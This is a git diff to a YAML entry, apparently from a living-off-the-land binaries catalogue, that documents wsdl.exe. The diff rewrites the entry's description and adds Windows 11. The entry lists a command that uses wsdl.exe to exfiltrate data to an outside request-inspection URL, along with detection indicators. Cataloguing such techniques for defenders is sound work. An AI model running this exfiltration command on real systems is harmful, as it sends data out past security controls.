diff --git a/yml/OtherMSBinaries/Wsdl.yml b/yml/OtherMSBinaries/Wsdl.yml index b144a4a..fa5f238 100644 --- a/yml/OtherMSBinaries/Wsdl.yml +++ b/yml/OtherMSBinaries/Wsdl.yml @@ -1,22 +1,19 @@ --- Name: wsdl.exe -Description: The Web Services Description Language(WSDL) is an XML-based interface description language that is used for describing the functionality offered by a web service. The acronym is also used for any specific WSDL description of a web service (also referred to as a WSDL file), which provides a machine-readable description of how the service can be called, what parameters it expects, and what data structures it returns. Therefore, its purpose is roughly similar to that of a type signature in a programming language. -Author: 'Ialle Teixeira' +Description: .NET Frameworks WebService install and administration tool +Author: Ialle Teixeira Created: 2022-03-28 Commands: - Command: wsdl.exe /server https://requestinspector.com/insp/inspect/XXXXXXXXXXXXXXX - Description: Upload file, credentials or data exfiltration in general - Usecase: Upload file + Description: "Exfiltrate data via a HTTP web request's URL." + Usecase: Exfiltrate data Category: Upload Privileges: User MitreID: T1567 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wsdl.exe -Code_Sample: - - Code: -Detection: - - IOC: wsdl.exe storing data into alternate data streams. +Detection: - IOC: Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching wsdl.exe file. - IOC: User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.42000)" @@ -27,4 +24,3 @@ Resources: - Link: https://pt.stackoverflow.com/questions/29116/o-que-%C3%A9-wsdl-web-services-description-language Acknowledgement: - Person: Ialle Teixeira - Handle: 'in@isdebuggerpresent'